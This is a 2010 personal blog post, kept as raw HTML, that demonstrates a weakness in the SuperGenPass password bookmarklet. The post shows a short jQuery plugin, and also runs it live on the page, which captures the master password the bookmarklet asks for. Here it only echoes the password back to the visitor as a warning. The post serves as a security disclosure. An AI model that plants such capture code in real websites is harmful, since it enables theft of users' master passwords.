<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    
    <title>SuperGenFail &mdash; Pratik Gupte</title>
    
    
    
        
    
    <meta name="description" content="SuperGenPass considered harmful" />
    
    
    <meta name="keywords" content="Pratik Gupte,Pratik Vinay Gupte,randomsurfer" />
    <meta name="author" content="Pratik Gupte" />
    <link rel="alternate" type="application/atom+xml" title="Pratik Gupte" href="/feed.xml">
    <link href="" rel="openid2.provider" />
    <link href="" rel="openid2.local_id" />
    <link href="" rel="openid.server" />
    <link href="" rel="openid.delegate" />
    <link rel="icon" type="image/vnd.microsoft.icon" href="/assets/themes/default/images/favicon.ico" />
    <link rel="icon" type="image/png" href="/assets/themes/default/images/favicon.png" />
    <link rel="apple-touch-icon" href="/assets/themes/default/images/ios.png"/>    
    <meta name="viewport" content="width=800" />    
    
    <link rel="stylesheet" href="/assets/themes/default/css/screen.css?52480=52480" media="screen" />            
    
    <link rel="stylesheet" href="/assets/themes/default/css/print.css" media="screen" />            
    
        
    <!--[if IE]>
    <script src="/assets/themes/default/js/html5.js"></script>
    <![endif]-->    
    
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js" type="text/javascript"></script>
    
    <script src="/assets/themes/default/js/site.min.js?131513?131513" type="text/javascript"></script>
    
        
</head>
<body class="journal">
<div id="wrapper">
<div id="inner_wrapper">    
    <div id="container">          
        <header id="title">
            <h1><a href="/">Pratik Gupte</a></h1>
        </header>        
        <nav id="main_nav">
            <ul>
                
                <li><a href="/about/" class="about">about</a></li>
                
                <li><a href="/research/" class="research">research</a></li>
                
                <li><a href="/projects/" class="projects">projects</a></li>
                
                <li><a href="/photography/" class="photography">photography</a></li>
                
            </ul>
        </nav>        
        <div id="content">
        <article>
    <header>
        <h1><a href="/2010/07/19/supergenfail/" rel="bookmark" title="link to this post">SuperGenFail</a></h1>
        <time datetime="2010-07-19" pubdate>Published Monday, July 19, 2010</time>
    </header>
    <style type="text/css">
form#supergenpass_test {
    height: auto;
    overflow: auto;
    padding-left: 20px;
    margin-bottom: 20px;
    }
    form#supergenpass_test div {
        clear: both;
        padding-bottom: 10px;
        }
    form#supergenpass_test label {
        width: 100px;
        float: left;
        font-size: 16px;
        line-height: 25px;
        }
    form#supergenpass_test input {
        width: 200px;
        padding: 2px;
        font-size: 16px;
        font-family: Helvetica, Arial, verdana;
        border: 1px solid #000;
        }
</style>

<script type="text/javascript">
(function($) {
    var eventName = 'masterPassword',
        genPassInput = '#gp2_pass_box input[type="password"]',
        genPassButton = '#gp2_pass_box input[type="button"]';
    $.event.special.masterPassword = {
        setup: function() {
            var elem = $(this),
                captureMasterPassword = function() {
                    elem.trigger(eventName, $(genPassInput).val());
                };
            $(genPassButton).live('click', captureMasterPassword);
            $(genPassInput).live('keydown', function(e) {
                if (e.keyCode === 13) { captureMasterPassword(e); }
            });
        }
    };
})(jQuery);

jQuery(function($){
    $(document).bind('masterPassword', function(e, data) {
        $('<div><em>Be safe, stop using SuperGenPass.  Your master password is: <strong>' + data +'</strong></em></div>')
            .hide()
            .appendTo($('#supergenpass_test'))
            .show(300);
    });        
});

</script>

<p><a href="http://supergenpass.com/">SuperGenPass</a> is a popular password management tool.  The pitch:</p>

<blockquote>
  <p>Instead of storing your passwords on your hard disk or online—where they are vulnerable to theft and data loss—SuperGenPass uses a hash algorithm to transform a master password into unique, complex passwords for the Web sites you visit. </p>
</blockquote>

<p>And this functionality is all bundled up in a bookmarklet.  Alice visits a host’s login form, clicks her SuperGenPass bookmarklet, enters her master password, and her host’s password field is instantly populated with a hash of the host’s URL + her master password – a long, unique, password that Alice never even has to know.  <em>Clever.</em>  Except,</p>

<h3 id="supergenpass-is-completely-insecure">SuperGenPass is completely insecure.</h3>

<p>SuperGenPass presents a small master password form overlaid across the host’s login page by injecting its form <em>into the DOM of the host page</em>.  So, when Alice is providing her master password, she’s <em>crossing a trust boundary</em>.  The master password, which ideally is never transmitted to <em>any</em> party, becomes co-mingled with the host’s untrusted data and scripts simply by being typed.  And of course, once the site has the master, it can be transmitted back to the host, or even other domains.  An XSS hole would allow an attacker to easily plant a master password collector.</p>

<h3 id="jquery-based-attack">jQuery-based Attack</h3>

<p>As of writing, SuperGenPass’s <a href="http://supergenpass.com/">site</a> neither identifies its creator nor provides a way to contact its maintainers, and its <a href="http://groups.google.com/group/supergenpass">mailing list</a> has disappeared.  It seems reasonable to demonstrate just how easy it is to capture a master password.</p>

<p>Here’s a quickie <a href="http://jquery.com/">jQuery</a> plugin which uses the <a href="http://benalman.com/news/2010/03/jquery-special-events/">Special Events API</a> to expose a new event named <code>masterPassword</code> which is raised after a user has entered a master password, passing along the password as event data.  It uses live event delegation to bind events raised on SuperGenPass form inputs which will be injected by the bookmarklet.</p>

<div class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">$</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">eventName</span> <span class="o">=</span> <span class="s1">&#39;masterPassword&#39;</span><span class="p">,</span>
        <span class="nx">genPassInput</span> <span class="o">=</span> <span class="s1">&#39;#gp2_pass_box input[type=&quot;password&quot;]&#39;</span><span class="p">,</span>
        <span class="nx">genPassButton</span> <span class="o">=</span> <span class="s1">&#39;#gp2_pass_box input[type=&quot;button&quot;]&#39;</span><span class="p">;</span>
    <span class="nx">$</span><span class="p">.</span><span class="nx">event</span><span class="p">.</span><span class="nx">special</span><span class="p">[</span><span class="nx">eventName</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
        <span class="nx">setup</span><span class="o">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">elem</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="k">this</span><span class="p">),</span>
                <span class="nx">captureMasterPassword</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
                    <span class="nx">elem</span><span class="p">.</span><span class="nx">trigger</span><span class="p">(</span><span class="nx">eventName</span><span class="p">,</span> <span class="nx">$</span><span class="p">(</span><span class="nx">genPassInput</span><span class="p">).</span><span class="nx">val</span><span class="p">());</span>
                <span class="p">};</span>
            <span class="nx">$</span><span class="p">(</span><span class="nx">genPassButton</span><span class="p">).</span><span class="nx">live</span><span class="p">(</span><span class="s1">&#39;click&#39;</span><span class="p">,</span> <span class="nx">captureMasterPassword</span><span class="p">);</span>
            <span class="nx">$</span><span class="p">(</span><span class="nx">genPassInput</span><span class="p">).</span><span class="nx">live</span><span class="p">(</span><span class="s1">&#39;keydown&#39;</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">keyCode</span> <span class="o">===</span> <span class="mi">13</span><span class="p">)</span> <span class="p">{</span> <span class="nx">captureMasterPassword</span><span class="p">(</span><span class="nx">e</span><span class="p">);</span> <span class="p">}</span>
            <span class="p">});</span>
        <span class="p">}</span>
    <span class="p">};</span>
<span class="p">})(</span><span class="nx">jQuery</span><span class="p">);</span></code></pre></div>

<p>A <em>friendly</em> site could use it for good:</p>

<div class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nx">$</span><span class="p">(</span><span class="nb">document</span><span class="p">).</span><span class="nx">bind</span><span class="p">(</span><span class="s1">&#39;masterPassword&#39;</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;Be safe, stop using SuperGenPass.  Your master password was &#39;</span> <span class="o">+</span> <span class="nx">data</span><span class="p">);</span>
<span class="p">});</span></code></pre></div>

<p>So, let’s try it out.  Grab the SuperGenPass <a href="http://supergenpass.com/">bookmarklet</a>, and then come back here and click it.  The mockup login form below will be automatically targeted.  </p>

<form method="GET" action="/" id="supergenpass_test">
    <div>
        <label for="username">User Name</label><input type="text" name="username" />
    </div>
    <div>
        <label for="password">Password</label><input type="password" name="password" />
    </div>
</form>

<h3 id="wow-thats-nuts-who-would-use-supergenpass">Wow, that’s nuts. Who would use SuperGenPass?</h3>

<p>Well, it’s interesting.  SuperGenPass tends to be used and recommended exclusively within technical circles, by people who know the importance of strong passwords and have at least a vague notion of what hashing is.  I suspect the cleverness and technical elegance of the solution is precisely why it lives on, like a tickle in the mind.  </p>

<h3 id="alternatives">Alternatives</h3>

<p>Since the main vulnerability is a trust boundary violation, moving the password form out of the host’s DOM could theoretically be enough.  Direct browser or OS integration could accomplish this, and <a href="https://addons.mozilla.org/en-US/firefox/addon/52490/">several</a> <a href="http://github.com/gfxmonk/supergenpass">projects</a> attempt to do just that, although I’ve never tried them.  And in the end, sometimes you can’t beat the physical world for digital security.  </p>

<p><a href="http://www.schneier.com/blog/archives/2005/06/write_down_your.html">Bruce Schneier</a>:</p>

<blockquote>
  <p>Simply, people can no longer remember passwords good enough to reliably defend against dictionary attacks, and are much more secure if they choose a password too complicated to remember and then write it down. We’re all good at securing small pieces of paper. I recommend that people write their passwords down on a small piece of paper, and keep it with their other valuable small pieces of paper: in their wallet.</p>
</blockquote>

<p>Be careful out there.</p>
        

     
    <p>
        <a href="/2010/07/09/proxying-asp.net-ajax-events-with-jquery/" title="Previous Post: Proxying ASP.NET AJAX events with jQuery">&larr; Proxying ASP.NET AJAX events with jQuery</a>
    </p>
    
</article>




        </div>        
    </div>    
    <div id="footer-wrapper">
        <footer>
            <section title="Colophon" class="colophon" itemscope itemtype="http://data-vocabulary.org/Person">
                <h1>Explain Yourself</h1>
                <p><span itemprop="name">Pratik Gupte</span> is a <span itemprop="role">Data Scientist</span> at <span itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address"><span itemprop="locality">Indix.com</span></span>.  This is his site.  <a href="/about/" title="More about Pratik">Read on.</a></p>
                <p>Also,</p>
                <nav>
                    <ul>
                        <li class="hide"><a itemprop="url" href="/" title="You are Here">Site</a></li>
                        <li><a href="http://github.com/randomsurfer" title="The Secret Codes">GitHub</a></li>
                        <li><a href="https://www.linkedin.com/in/pgupte/" title="The Social Network with Sleeves.">LinkedIn</a></li>
                        <li><a href="mailto:pratik.gupte@gmail.com" title="You remember email, right?">Email</a></li>
                    </ul>
                </nav>
            </section>
            <section title="Copyright" class="attribution">
                <p>Copyright &copy; 2015 Pratik Gupte. Template by Michael Monteleone <a href="http://creativecommons.org/licenses/by/3.0/us/">Some rights reserved</a>.</p>
            </section>
        </footer>
        <div style="clear:both"></div>
    </div>    
</div>
</div>
</body>
</html>
